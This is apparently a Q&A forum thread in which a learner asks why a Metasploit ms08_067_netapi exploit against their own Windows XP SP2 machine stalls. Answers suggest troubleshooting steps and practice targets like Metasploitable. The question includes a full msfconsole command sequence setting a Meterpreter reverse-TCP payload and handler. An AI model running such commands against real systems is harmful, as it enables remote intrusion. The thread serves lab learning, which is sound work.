Backtrack 5 Armitage MSF

1.3k Views Asked by At

I'm learning the Metasploit framwork starting with Armitage to get a general understanding of the structure and such. I was trying to hack into an old Windowx XP sp2 I have when I try to run the exploits I get this

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf  exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf  exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf  exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf  exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf  exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...

I don't get any errors but it stalls there and doesn't carry out the exploit.

2

There are 2 best solutions below

1
On

I wrote Armitage. Here are a few things to keep in mind:

  • ms08_067_netapi is a reliable exploit against an unpatched Windows XP system. However, there are many things that can go wrong with a remote exploit. Try rebooting the target system and make sure the host-based firewall is off. If it still doesn't work, then it's possible your XP system is patched. shrug

  • I noticed the title of this SO post refers to BackTrack Linux. Armitage is no longer supported on BackTrack Linux. The Metasploit Framework went through a major dependency shift in April 2013, breaking BackTrack Linux environments. Consider moving to Kali Linux. This is the successor to BackTrack Linux.

Google for Kali Linux [I don't have the "reputation" points to give you more than two links]

  • The best "first target" for Armitage and the Metasploit Framework is Metasploitable. This is a free Linux virtual machine, made available the Metasploit Team. It has several vulnerabilities and misconfigurations built into it. It's available for download here:

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

  • I wrote a Getting Started with Armitage tutorial. This tutorial will take you through a few of the attacks against the Metasploitable virtual machine:

http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/

0
On

So it looks like the exploit doesn't work with the version of Windows you have. Maybe you can try another one, something simpler. When were these exploits created? Are you absolutely sure they are unpatched in your version of Windows?

If you want to learn anything from running exploit scripts written by others, you have to start debugging and try to understand what the script is doing. Find what exactly the script is doing after it says Attempting to trigger the vulnerability and try to figure out why it might not be working. There are too many possibilities to speculate here.